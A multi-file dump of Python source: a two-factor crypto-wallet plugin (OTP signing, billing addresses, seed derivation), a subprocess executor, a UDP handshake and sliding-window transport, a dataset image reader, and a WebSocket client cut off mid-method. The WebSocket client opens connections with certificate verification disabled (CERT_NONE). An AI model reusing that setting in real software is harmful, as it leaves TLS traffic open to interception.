def on_otp(self, tx: PartialTransaction, otp):
if not otp:
self.logger.info("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize_as_bytes().hex()
assert raw_tx[:10] == "70736274ff", f"bad magic. {raw_tx[:10]}"
try:
r = server.sign(short_id, raw_tx, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
raise UserFacingException(_('Invalid one-time password.')) from e
else:
raise
if r:
received_raw_tx = r.get('transaction')
received_tx = Transaction(received_raw_tx)
tx.combine_with_other_psbt(received_tx)
self.logger.info(f"twofactor: is complete {tx.is_complete()}")
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str, addr_type: str):
billing_addresses_of_this_type = self._billing_addresses[addr_type]
saved_addr = billing_addresses_of_this_type.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(billing_addresses_of_this_type) if billing_addresses_of_this_type else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i, addr_type=addr_type)
billing_addresses_of_this_type[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
billing_addresses_of_this_type[billing_index] = address
self._billing_addresses_set.add(address)
self._billing_addresses[addr_type] = billing_addresses_of_this_type
self.db.put('trustedcoin_billing_addresses', self._billing_addresses['legacy'])
self.db.put('trustedcoin_billing_addresses_segwit', self._billing_addresses['segwit'])
# FIXME this often runs in a daemon thread, where storage.write will fail
self.db.write(self.storage)
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
def get_user_id(db):
def make_long_id(xpub_hot, xpub_cold):
return sha256(''.join(sorted([xpub_hot, xpub_cold])))
xpub1 = db.get('x1/')['xpub']
xpub2 = db.get('x2/')['xpub']
long_id = make_long_id(xpub1, xpub2)
short_id = hashlib.sha256(long_id).hexdigest()
return long_id, short_id
def make_xpub(xpub, s) -> str:
rootnode = BIP32Node.from_xkey(xpub)
child_pubkey, child_chaincode = bip32._CKD_pub(parent_pubkey=rootnode.eckey.get_public_key_bytes(compressed=True),
parent_chaincode=rootnode.chaincode,
child_index=s)
child_node = BIP32Node(xtype=rootnode.xtype,
eckey=ecc.ECPubkey(child_pubkey),
chaincode=child_chaincode)
return child_node.to_xpub()
def make_billing_address(wallet, num, addr_type):
long_id, short_id = wallet.get_user_id()
xpub = make_xpub(get_billing_xpub(), long_id)
usernode = BIP32Node.from_xkey(xpub)
child_node = usernode.subkey_at_public_derivation([num])
pubkey = child_node.eckey.get_public_key_bytes(compressed=True)
if addr_type == 'legacy':
return avian.public_key_to_p2pkh(pubkey)
elif addr_type == 'segwit':
return avian.public_key_to_p2wpkh(pubkey)
else:
raise ValueError(f'unexpected billing type: {addr_type}')
class TrustedCoinPlugin(BasePlugin):
wallet_class = Wallet_2fa
disclaimer_msg = DISCLAIMER
def __init__(self, parent, config, name):
BasePlugin.__init__(self, parent, config, name)
self.wallet_class.plugin = self
self.requesting = False
@staticmethod
def is_valid_seed(seed):
t = seed_type(seed)
return is_any_2fa_seed_type(t)
def is_available(self):
return True
def is_enabled(self):
return True
def can_user_disable(self):
return False
@hook
def tc_sign_wrapper(self, wallet, tx, on_success, on_failure):
if not isinstance(wallet, self.wallet_class):
return
if tx.is_complete():
return
if wallet.can_sign_without_server():
return
if not wallet.keystores['x3/'].can_sign(tx, ignore_watching_only=True):
self.logger.info("twofactor: xpub3 not needed")
return
def wrapper(tx):
assert tx
self.prompt_user_for_otp(wallet, tx, on_success, on_failure)
return wrapper
def prompt_user_for_otp(self, wallet, tx, on_success, on_failure) -> None:
raise NotImplementedError()
@hook
def get_tx_extra_fee(self, wallet, tx: Transaction):
if type(wallet) != Wallet_2fa:
return
for o in tx.outputs():
if wallet.is_billing_address(o.address):
return o.address, o.value
def finish_requesting(func):
def f(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
finally:
self.requesting = False
return f
@finish_requesting
def request_billing_info(self, wallet: 'Wallet_2fa', *, suppress_connection_error=True):
if wallet.can_sign_without_server():
return
self.logger.info("request billing info")
try:
billing_info = server.get(wallet.get_user_id()[1])
except ErrorConnectingServer as e:
if suppress_connection_error:
self.logger.info(repr(e))
return
raise
billing_index = billing_info['billing_index']
# add segwit billing address; this will be used for actual billing
billing_address = make_billing_address(wallet, billing_index, addr_type='segwit')
if billing_address != billing_info['billing_address_segwit']:
raise Exception(f'unexpected trustedcoin billing address: '
f'calculated {billing_address}, received {billing_info["billing_address_segwit"]}')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='segwit')
# also add legacy billing address; only used for detecting past payments in GUI
billing_address = make_billing_address(wallet, billing_index, addr_type='legacy')
wallet.add_new_billing_address(billing_index, billing_address, addr_type='legacy')
wallet.billing_info = billing_info
wallet.price_per_tx = dict(billing_info['price_per_tx'])
wallet.price_per_tx.pop(1, None)
return True
def start_request_thread(self, wallet):
from threading import Thread
if self.requesting is False:
self.requesting = True
t = Thread(target=self.request_billing_info, args=(wallet,))
t.setDaemon(True)
t.start()
return t
def make_seed(self, seed_type):
if not is_any_2fa_seed_type(seed_type):
raise Exception(f'unexpected seed type: {seed_type}')
return Mnemonic('english').make_seed(seed_type=seed_type)
@hook
def do_clear(self, window):
window.wallet.is_billing = False
def show_disclaimer(self, wizard: BaseWizard):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
wizard.confirm_dialog(title='Disclaimer', message='\n\n'.join(self.disclaimer_msg), run_next = lambda x: wizard.run('choose_seed'))
def choose_seed(self, wizard):
title = _('Create or restore')
message = _('Do you want to create a new seed, or to restore a wallet using an existing seed?')
choices = [
('choose_seed_type', _('Create a new seed')),
('restore_wallet', _('I already have a seed')),
]
wizard.choice_dialog(title=title, message=message, choices=choices, run_next=wizard.run)
def choose_seed_type(self, wizard):
seed_type = '2fa' if self.config.get('nosegwit') else '2fa_segwit'
self.create_seed(wizard, seed_type)
def create_seed(self, wizard, seed_type):
seed = self.make_seed(seed_type)
f = lambda x: wizard.request_passphrase(seed, x)
wizard.opt_bip39 = False
wizard.opt_ext = True
wizard.show_seed_dialog(run_next=f, seed_text=seed)
@classmethod
def get_xkeys(self, seed, t, passphrase, derivation):
assert is_any_2fa_seed_type(t)
xtype = 'standard' if t == '2fa' else 'p2wsh'
bip32_seed = Mnemonic.mnemonic_to_seed(seed, passphrase)
rootnode = BIP32Node.from_rootseed(bip32_seed, xtype=xtype)
child_node = rootnode.subkey_at_private_derivation(derivation)
return child_node.to_xprv(), child_node.to_xpub()
@classmethod
def xkeys_from_seed(self, seed, passphrase):
t = seed_type(seed)
if not is_any_2fa_seed_type(t):
raise Exception(f'unexpected seed type: {t}')
words = seed.split()
n = len(words)
if t == '2fa':
if n >= 20: # old scheme
# note: pre-2.7 2fa seeds were typically 24-25 words, however they
# could probabilistically be arbitrarily shorter due to a bug. (see #3611)
# the probability of it being < 20 words is about 2^(-(256+12-19*11)) = 2^(-59)
if passphrase != '':
raise Exception('old 2fa seed cannot have passphrase')
xprv1, xpub1 = self.get_xkeys(' '.join(words[0:12]), t, '', "m/")
xprv2, xpub2 = self.get_xkeys(' '.join(words[12:]), t, '', "m/")
elif n == 12: # new scheme
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception(f'unrecognized seed length for "2fa" seed: {n}')
elif t == '2fa_segwit':
xprv1, xpub1 = self.get_xkeys(seed, t, passphrase, "m/0'/")
xprv2, xpub2 = self.get_xkeys(seed, t, passphrase, "m/1'/")
else:
raise Exception(f'unexpected seed type: {t}')
return xprv1, xpub1, xprv2, xpub2
def create_keystore(self, wizard, seed, passphrase):
# this overloads the wizard's method
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xpub(xpub2)
wizard.request_password(run_next=lambda pw, encrypt: self.on_password(wizard, pw, encrypt, k1, k2))
def on_password(self, wizard, password, encrypt_storage, k1, k2):
k1.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
self.go_online_dialog(wizard)
def restore_wallet(self, wizard):
wizard.opt_bip39 = False
wizard.opt_ext = True
title = _("Restore two-factor Wallet")
f = lambda seed, is_bip39, is_ext: wizard.run('on_restore_seed', seed, is_ext)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_restore_seed(self, wizard, seed, is_ext):
f = lambda x: self.restore_choice(wizard, seed, x)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def restore_choice(self, wizard: BaseWizard, seed, passphrase):
wizard.set_icon('trustedcoin-wizard.png')
wizard.reset_stack()
title = _('Restore 2FA wallet')
msg = ' '.join([
'You are going to restore a wallet protected with two-factor authentication.',
'Do you want to keep using two-factor authentication with this wallet,',
'or do you want to disable it, and have two master private keys in your wallet?'
])
choices = [('keep', 'Keep'), ('disable', 'Disable')]
f = lambda x: self.on_choice(wizard, seed, passphrase, x)
wizard.choice_dialog(choices=choices, message=msg, title=title, run_next=f)
def on_choice(self, wizard, seed, passphrase, x):
if x == 'disable':
f = lambda pw, encrypt: wizard.run('on_restore_pw', seed, passphrase, pw, encrypt)
wizard.request_password(run_next=f)
else:
self.create_keystore(wizard, seed, passphrase)
def on_restore_pw(self, wizard, seed, passphrase, password, encrypt_storage):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
k1 = keystore.from_xprv(xprv1)
k2 = keystore.from_xprv(xprv2)
k1.add_seed(seed)
k1.update_password(None, password)
k2.update_password(None, password)
wizard.data['x1/'] = k1.dump()
wizard.data['x2/'] = k2.dump()
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.pw_args = WizardWalletPasswordSetting(password=password,
encrypt_storage=encrypt_storage,
storage_enc_version=StorageEncryptionVersion.USER_PASSWORD,
encrypt_keystore=bool(password))
wizard.terminate()
def create_remote_key(self, email, wizard):
xpub1 = wizard.data['x1/']['xpub']
xpub2 = wizard.data['x2/']['xpub']
# Generate third key deterministically.
long_user_id, short_id = get_user_id(wizard.data)
xtype = xpub_type(xpub1)
xpub3 = make_xpub(get_signing_xpub(xtype), long_user_id)
# secret must be sent by the server
try:
r = server.create(xpub1, xpub2, email)
except (socket.error, ErrorConnectingServer):
wizard.show_message('Server not reachable, aborting')
wizard.terminate(aborted=True)
return
except TrustedCoinException as e:
if e.status_code == 409:
r = None
else:
wizard.show_message(str(e))
return
if r is None:
otp_secret = None
else:
otp_secret = r.get('otp_secret')
if not otp_secret:
wizard.show_message(_('Error'))
return
_xpub3 = r['xpubkey_cosigner']
_id = r['id']
if short_id != _id:
wizard.show_message("unexpected trustedcoin short_id: expected {}, received {}"
.format(short_id, _id))
return
if xpub3 != _xpub3:
wizard.show_message("unexpected trustedcoin xpub3: expected {}, received {}"
.format(xpub3, _xpub3))
return
self.request_otp_dialog(wizard, short_id, otp_secret, xpub3)
def check_otp(self, wizard, short_id, otp_secret, xpub3, otp, reset):
if otp:
self.do_auth(wizard, short_id, otp, xpub3)
elif reset:
wizard.opt_bip39 = False
wizard.opt_ext = True
f = lambda seed, is_bip39, is_ext: wizard.run('on_reset_seed', short_id, seed, is_ext, xpub3)
wizard.restore_seed_dialog(run_next=f, test=self.is_valid_seed)
def on_reset_seed(self, wizard, short_id, seed, is_ext, xpub3):
f = lambda passphrase: wizard.run('on_reset_auth', short_id, seed, passphrase, xpub3)
wizard.passphrase_dialog(run_next=f) if is_ext else f('')
def do_auth(self, wizard, short_id, otp, xpub3):
try:
server.auth(short_id, otp)
except TrustedCoinException as e:
if e.status_code == 400: # invalid OTP
wizard.show_message(_('Invalid one-time password.'))
# ask again for otp
self.request_otp_dialog(wizard, short_id, None, xpub3)
else:
wizard.show_message(str(e))
wizard.terminate(aborted=True)
except Exception as e:
wizard.show_message(repr(e))
wizard.terminate(aborted=True)
else:
k3 = keystore.from_xpub(xpub3)
wizard.data['x3/'] = k3.dump()
wizard.data['use_trustedcoin'] = True
wizard.terminate()
def on_reset_auth(self, wizard, short_id, seed, passphrase, xpub3):
xprv1, xpub1, xprv2, xpub2 = self.xkeys_from_seed(seed, passphrase)
if (wizard.data['x1/']['xpub'] != xpub1 or
wizard.data['x2/']['xpub'] != xpub2):
wizard.show_message(_('Incorrect seed'))
return
r = server.get_challenge(short_id)
challenge = r.get('challenge')
message = 'TRUSTEDCOIN CHALLENGE: ' + challenge
def f(xprv):
rootnode = BIP32Node.from_xkey(xprv)
key = rootnode.subkey_at_private_derivation((0, 0)).eckey
sig = key.sign_message(message, True)
return base64.b64encode(sig).decode()
signatures = [f(x) for x in [xprv1, xprv2]]
r = server.reset_auth(short_id, challenge, signatures)
new_secret = r.get('otp_secret')
if not new_secret:
wizard.show_message(_('Request rejected by server'))
return
self.request_otp_dialog(wizard, short_id, new_secret, xpub3)
@hook
def get_action(self, db):
if db.get('wallet_type') != '2fa':
return
if not db.get('x1/'):
return self, 'show_disclaimer'
if not db.get('x2/'):
return self, 'show_disclaimer'
if not db.get('x3/'):
return self, 'accept_terms_of_use'
|
PythonExecutor.py
|
#!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import logging
import os
import subprocess
import pprint
import threading
import platform
from threading import Thread
import time
from BackgroundCommandExecutionHandle import BackgroundCommandExecutionHandle
from ambari_commons.os_check import OSConst, OSCheck
from Grep import Grep
import sys
from ambari_commons import shell
from ambari_commons.shell import shellRunner
logger = logging.getLogger()
class PythonExecutor:
"""
Performs functionality for executing python scripts.
Warning: class maintains internal state. As a result, instances should not be
used as a singleton for a concurrent execution of python scripts
"""
NO_ERROR = "none"
grep = Grep()
event = threading.Event()
python_process_has_been_killed = False
def __init__(self, tmpDir, config):
self.tmpDir = tmpDir
self.config = config
pass
def open_subprocess_files(self, tmpoutfile, tmperrfile, override_output_files):
if override_output_files: # Recreate files
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
else: # Append to files
tmpout = open(tmpoutfile, 'a')
tmperr = open(tmperrfile, 'a')
return tmpout, tmperr
def run_file(self, script, script_params, tmp_dir, tmpoutfile, tmperrfile,
timeout, tmpstructedoutfile, logger_level, callback, task_id,
override_output_files = True, handle = None, log_info_on_failure=True):
"""
Executes the specified python file in a separate subprocess.
Method returns only when the subprocess is finished.
Params arg is a list of script parameters
Timeout meaning: how many seconds should pass before script execution
is forcibly terminated
override_output_files option defines whether stdout/stderr files will be
recreated or appended.
The structured out file, however, is preserved during multiple invocations that use the same file.
"""
script_params += [tmpstructedoutfile, logger_level, tmp_dir]
pythonCommand = self.python_command(script, script_params)
logger.debug("Running command " + pprint.pformat(pythonCommand))
if handle is None:
tmpout, tmperr = self.open_subprocess_files(tmpoutfile, tmperrfile, override_output_files)
process = self.launch_python_subprocess(pythonCommand, tmpout, tmperr)
# map task_id to pid
callback(task_id, process.pid)
logger.debug("Launching watchdog thread")
self.event.clear()
self.python_process_has_been_killed = False
thread = Thread(target = self.python_watchdog_func, args = (process, timeout))
thread.start()
# Waiting for the process to be either finished or killed
process.communicate()
self.event.set()
thread.join()
result = self.prepare_process_result(process, tmpoutfile, tmperrfile, tmpstructedoutfile, timeout=timeout)
if log_info_on_failure and result['exitcode']:
self.on_failure(pythonCommand, result)
return result
else:
holder = Holder(pythonCommand, tmpoutfile, tmperrfile, tmpstructedoutfile, handle)
background = BackgroundThread(holder, self)
background.start()
return {"exitcode": 777}
def on_failure(self, pythonCommand, result):
"""
Log some useful information after task failure.
"""
logger.info("Command " + pprint.pformat(pythonCommand) + " failed with exitcode=" + str(result['exitcode']))
cmd_list = ["ps faux", "netstat -tulpn"]
shell_runner = shellRunner()
for cmd in cmd_list:
ret = shell_runner.run(cmd)
logger.info("Command '{0}' returned {1}. {2}{3}".format(cmd, ret["exitCode"], ret["error"], ret["output"]))
def prepare_process_result(self, process, tmpoutfile, tmperrfile, tmpstructedoutfile, timeout=None):
out, error, structured_out = self.read_result_from_files(tmpoutfile, tmperrfile, tmpstructedoutfile)
# Building results
returncode = process.returncode
if self.python_process_has_been_killed:
error = str(error) + "\n Python script has been killed due to timeout" + \
(" after waiting %s secs" % str(timeout) if timeout else "")
returncode = 999
result = self.condenseOutput(out, error, returncode, structured_out)
logger.debug("Result: %s" % result)
return result
def read_result_from_files(self, out_path, err_path, structured_out_path):
out = open(out_path, 'r').read()
error = open(err_path, 'r').read()
try:
with open(structured_out_path, 'r') as fp:
structured_out = json.load(fp)
except Exception:
if os.path.exists(structured_out_path):
errMsg = 'Unable to read structured output from ' + structured_out_path
structured_out = {
'msg' : errMsg
}
logger.warn(structured_out)
else:
structured_out = {}
return out, error, structured_out
def launch_python_subprocess(self, command, tmpout, tmperr):
"""
Creates subprocess with given parameters. This functionality was moved to separate method
to make possible unit testing
"""
close_fds = None if OSCheck.get_os_family() == OSConst.WINSRV_FAMILY else True
if OSCheck.get_os_family() == OSConst.WINSRV_FAMILY:
command_env = dict(os.environ)
command_env["PYTHONPATH"] = os.pathsep.join(sys.path)
for k, v in command_env.iteritems():
command_env[k] = str(v)
else:
command_env = None
return subprocess.Popen(command,
stdout=tmpout,
stderr=tmperr, close_fds=close_fds, env=command_env)
def isSuccessfull(self, returncode):
return not self.python_process_has_been_killed and returncode == 0
def python_command(self, script, script_params):
#we need manually pass python executable on windows because sys.executable will return service wrapper
python_binary = os.environ['PYTHON_EXE'] if 'PYTHON_EXE' in os.environ else sys.executable
python_command = [python_binary, script] + script_params
return python_command
def condenseOutput(self, stdout, stderr, retcode, structured_out):
log_lines_count = self.config.get('heartbeat', 'log_lines_count')
grep = self.grep
result = {
"exitcode": retcode,
"stdout": grep.tail(stdout, log_lines_count) if log_lines_count else stdout,
"stderr": grep.tail(stderr, log_lines_count) if log_lines_count else stderr,
"structuredOut" : structured_out
}
return result
def python_watchdog_func(self, python, timeout):
self.event.wait(timeout)
if python.returncode is None:
logger.error("Subprocess timed out and will be killed")
shell.kill_process_with_children(python.pid)
self.python_process_has_been_killed = True
pass
class Holder:
def __init__(self, command, out_file, err_file, structured_out_file, handle):
self.command = command
self.out_file = out_file
self.err_file = err_file
self.structured_out_file = structured_out_file
self.handle = handle
class BackgroundThread(threading.Thread):
def __init__(self, holder, pythonExecutor):
threading.Thread.__init__(self)
self.holder = holder
self.pythonExecutor = pythonExecutor
def run(self):
process_out, process_err = self.pythonExecutor.open_subprocess_files(self.holder.out_file, self.holder.err_file, True)
logger.debug("Starting process command %s" % self.holder.command)
process = self.pythonExecutor.launch_python_subprocess(self.holder.command, process_out, process_err)
logger.debug("Process has been started. Pid = %s" % process.pid)
self.holder.handle.pid = process.pid
self.holder.handle.status = BackgroundCommandExecutionHandle.RUNNING_STATUS
self.holder.handle.on_background_command_started(self.holder.handle.command['taskId'], process.pid)
process.communicate()
self.holder.handle.exitCode = process.returncode
process_condensed_result = self.pythonExecutor.prepare_process_result(process, self.holder.out_file, self.holder.err_file, self.holder.structured_out_file)
logger.debug("Calling callback with args %s" % process_condensed_result)
self.holder.handle.on_background_command_complete_callback(process_condensed_result, self.holder.handle)
logger.debug("Exiting from thread for holder pid %s" % self.holder.handle.pid)
|
UdpController.py
|
import logging
import time
import socket
from Packet import *
from packetConstructor import *
from const import *
from Window import *
import sys
class UdpController:
__conn = None
__routerAddr = None
__packetBuilder = None
def __init__(self):
pass
def connectServer(self):
"""
Three-way handshake
"""
logging.info("[Transport] Connecting to {}:{}.".format(SERVER_IP, SERVER_PORT))
self.__routerAddr = (ROUTER_IP, ROUTER_PORT)
peer_ip = ipaddress.ip_address(socket.gethostbyname(SERVER_IP))
self.__packetBuilder = PacketConstructor(peer_ip, SERVER_PORT)
self.__conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# Send SYN
p = self.__packetBuilder.build(PACKET_TYPE_SYN)
self.__conn.sendto(p.to_bytes(), self.__routerAddr)
self.__conn.settimeout(ALIVE)
logging.debug('[Transport] Client Waiting for a response from the server.')
# Expecting SYN_ACK
response, sender = self.__conn.recvfrom(PACKET_SIZE)
p = Packet.from_bytes(response)
logging.info("[Transport] Server connection established.")
except socket.timeout:
print("[Transport] Connecting timeout.")
self.__conn.close()
sys.exit(0)
if p.packet_type == PACKET_TYPE_SYN_AK:
# Send ACK
p = self.__packetBuilder.build(PACKET_TYPE_AK)
self.__conn.sendto(p.to_bytes(), self.__routerAddr)
# No need to timeout, we know server is ready
return True
else:
print("[Transport] Unexpected packet: {}".format(p))
self.__conn.close()
sys.exit(0)
def connectClient(self):
"""
Three-way handshake
"""
# self.__routerAddr = (ROUTER_IP,ROUTER_PORT)
self.__conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.__conn.bind(('', SERVER_PORT))
logging.info("[Transport] Server is listening at {}:{}.".format(SERVER_IP, SERVER_PORT))
packet = self.getPacket(ALIVE)
if packet is None:
print("[Transport] Connecting timeout.")
# TODO confirm timeout
return False
# if pkt type is syn, send ack syn, if already acked, return true
if packet.packet_type == PACKET_TYPE_SYN:
# addr = (packet.peer_ip_addr, packet.peer_port)
packet.packet_type = PACKET_TYPE_SYN_AK
self.__conn.sendto(packet.to_bytes(), self.__routerAddr)
# we can just ignore the coming ACK, because it could be lost but the sender would not deal with this case
# but we do should be careful with the first packet when receiving the http request
logging.info("[Transport] Client connection established.")
return True
return False
def sendMessage(self, message):
window = Window()
window.createSenderWindow(message)
threading.Thread(target=self.senderListener, args=(window,)).start()
while window.hasPendingPacket(): # Not all packets have been sent
# Get next sendable packets if there is any in WINDOW
for frame in window.getFrames():
p = self.__packetBuilder.build(PACKET_TYPE_DATA, frame.seq_num, frame.payload)
self.__conn.sendto(p.to_bytes(), self.__routerAddr)
logging.debug("[Transport] Send Message: {}".format(p.payload))
frame.timer = time.time()
frame.send = True
def senderListener(self, window):
"""
Listen response from server
"""
while window.hasPendingPacket():
# Find packets that have been sent but have not been ACKed
# Then, check their timer
try:
self.__conn.settimeout(TIME_OUT)
response, sender = self.__conn.recvfrom(PACKET_SIZE)
p = Packet.from_bytes(response)
logging.debug('[Transport] Received response: {}: {}'.format(p, p.payload.decode("utf-8")))
if p.packet_type == PACKET_TYPE_AK:
window.updateWindow(p.seq_num)
except socket.timeout:
logging.debug("[Transport] Timeout when wait ACK.")
for i in range(window.pointer, window.pointer + WINDOW_SIZE):
if i >= len(window.frames):
break
f = window.frames[i]
if f.send and not f.ACK:
# reset send status, so it can be re-sent
f.send = False
logging.debug('[Transport] Listener reaches the end!')
def receiveMessage(self):
window = Window()
window.createReceiverWindow()
while not window.finished():
# TODO if None, raise error
p = self.getPacket(TIME_OUT_FOR_RECEIVE)
if p is None:
logging.debug("[Transport] No message received in timeout time")
return None
# discard possible packet from handshake
if p.packet_type == PACKET_TYPE_AK and p.seq_num == 0:
continue
window.process(p)
# send ACK
p.packet_type = PACKET_TYPE_AK
self.__conn.sendto(p.to_bytes(), self.__routerAddr)
data = self.retrieveData(window)
return data
# return data (bytes)
def retrieveData(self, window):
data = b''
for f in window.frames:
data = data + f.payload
return data
def getPacket(self, timeout):
self.__conn.settimeout(timeout)
try:
data, addr = self.__conn.recvfrom(PACKET_SIZE)
pkt = Packet.from_bytes(data)
logging.debug("[Transport] Received: {}:{}".format(pkt,pkt.payload))
self.__routerAddr = addr
if self.__packetBuilder is None:
self.__packetBuilder = PacketConstructor(pkt.peer_ip_addr, pkt.peer_port)
return pkt
except socket.timeout:
logging.debug('[Transport] Time out when recvfrom message!')
return None
def dis_connect(self):
"""
Disconnecting: FIN, ACK, FIN, ACK
"""
logging.info("Disconnecting.")
self.__conn.close()
|
ReadData.py
|
from DataUtils import *
import threading, cv2, sys, time
class ReadData():
def __init__(self, dsName='airsim', subType='mr', seq=0):
self.dsName = dsName
self.subType = subType
self.path = getPath(dsName, seq=seq, subType=subType)
if dsName == 'airsim':
self.data = pd.read_csv(self.path + 'data.txt', sep=' ', header=None)
self.time_stamp = self.data.iloc[:, 0].values
else:
self.time_stamp = None
# images
self.imgNames = getImgNames(self.path, dsName, ts=self.time_stamp, subType=subType)
print(self.imgNames)
self.numImgs = len(self.imgNames)
self.numChannel = 3 if self.dsName is not 'euroc' else 1
self.imgs = np.zeros((self.numImgs, self.numChannel, 360, 720), dtype=np.float32)
self.getImages()
def getNewImgNames(self, subtype='bar'):
return getImgNames(self.path, self.dsName, self.time_stamp, subType=subtype)
def getImgsFromTo(self, start, N):
if start > self.numImgs:
sys.exit('ReadData-getImgsFromTo: this should be the case')
end, N = getEnd(start, N, self.numImgs)
print('PrepData-reading imgs from %d to %d(): reading imgs' % (start, end))
for i in range(start, end):
fName = self.imgNames[i]
if self.dsName == 'euroc':
img = cv2.imread(fName, 0) / 255.0
else:
img = cv2.imread(fName) / 255.0
if self.dsName is not 'airsim':
img = cv2.resize(img, (720, 360))
img = np.reshape(img.astype(np.float32), (-1, self.numChannel, 360, 720))
self.imgs[i, :] = img # no lock is necessary
print('PrepData-reading imgs from %d to %d(): done reading imgs' % (start, end))
def getImages(self):
partN = 500
nThread = int(self.numImgs / partN) + 1
print('# of thread reading imgs: %d' % (nThread))
threads = []
for i in range(0, nThread):
start = i * partN
threads.append(threading.Thread(target=self.getImgsFromTo, args=(start, partN)))
threads[i].start()
for thread in threads:
thread.join() # wait until this thread ends ~ bit of loss in time..
if __name__ == '__main__':
ReadData(dsName='airsim', subType='mr', seq=2)
|
websocket_client.py
|
import json
import logging
import socket
import ssl
import sys
import traceback
from datetime import datetime
from threading import Lock, Thread
from time import sleep
from typing import Optional
import websocket
from vnpy.trader.utility import get_file_logger
class WebsocketClient(object):
"""
Websocket API
After creating the client object, use start() to run worker and ping threads.
The worker thread connects websocket automatically.
Use stop to stop threads and disconnect websocket before destroying the client
object (especially when exiting the programme).
Default serialization format is json.
Callbacks to overrides:
* unpack_data
* on_connected
* on_disconnected
* on_packet
* on_error
After start() is called, the ping thread will ping server every 60 seconds.
If you want to send anything other than JSON, override send_packet.
"""
def __init__(self):
"""Constructor"""
self.host = None
self._ws_lock = Lock()
self._ws = None
self._worker_thread = None
self._ping_thread = None
self._active = False
self.proxy_host = None
self.proxy_port = None
self.ping_interval = 60 # seconds
self.header = {}
self.logger: Optional[logging.Logger] = None
# For debugging
self._last_sent_text = None
self._last_received_text = None
def init(self,
host: str,
proxy_host: str = "",
proxy_port: int = 0,
ping_interval: int = 60,
header: dict = None,
log_path: Optional[str] = None,
):
"""
:param host:
:param proxy_host:
:param proxy_port:
:param header:
:param ping_interval: unit: seconds, type: int
:param log_path: optional. file to save log.
"""
self.host = host
self.ping_interval = ping_interval # seconds
if log_path is not None:
self.logger = get_file_logger(log_path)
self.logger.setLevel(logging.DEBUG)
if header:
self.header = header
if proxy_host and proxy_port:
self.proxy_host = proxy_host
self.proxy_port = proxy_port
def start(self):
"""
Start the client and on_connected function is called after webscoket
is connected succesfully.
Please don't send packet untill on_connected fucntion is called.
"""
self._active = True
self._worker_thread = Thread(target=self._run)
self._worker_thread.start()
self._ping_thread = Thread(target=self._run_ping)
self._ping_thread.start()
def stop(self):
"""
Stop the client.
"""
self._active = False
self._disconnect()
def join(self):
"""
Wait till all threads finish.
This function cannot be called from worker thread or callback function.
"""
self._ping_thread.join()
self._worker_thread.join()
def send_packet(self, packet: dict):
"""
Send a packet (dict data) to server
override this if you want to send non-json packet
"""
text = json.dumps(packet)
self._record_last_sent_text(text)
return self._send_text(text)
def _log(self, msg, *args):
logger = self.logger
if logger:
logger.debug(msg, *args)
def _send_text(self, text: str):
"""
Send a text string to server.
"""
ws = self._ws
if ws:
ws.send(text, opcode=websocket.ABNF.OPCODE_TEXT)
self._log('sent text: %s', text)
def _send_binary(self, data: bytes):
"""
Send bytes data to server.
"""
ws = self._ws
if ws:
ws._send_binary(data)
self._log('sent binary: %s', data)
def _create_connection(self, *args, **kwargs):
""""""
return websocket.create_connection(*args, **kwargs)
def _ensure_connection(self):
""""""
triggered = False
with self._ws_lock:
if self._ws is None:
self._ws = self._create_connection(
self.host,
sslopt={"cert_reqs": ssl.CERT_NONE},
http_proxy_host=self.proxy_host,
http_proxy_port=self.proxy_port,
header=self.header
)
triggered = True
if triggered:
self.on_connected()
def _disconnect(self):
"""
"""
triggered = False
with self._ws_lock:
if self._ws:
ws: websocket.WebSocket = self._ws
self._ws = None
triggered = True
if triggered:
ws.close()
self.on_disconnected()
def _run(self):
"""
Keep running till stop is called.
"""
try:
while self._active:
try:
self._ensure_connection()
ws = self._ws
if ws:
text = ws.recv()
# ws object is closed when recv function is blocking
if not text:
self._disconnect()
continue
self._record_last_received_text(text)
try:
data = self.unpack_data(text)
except ValueError as e:
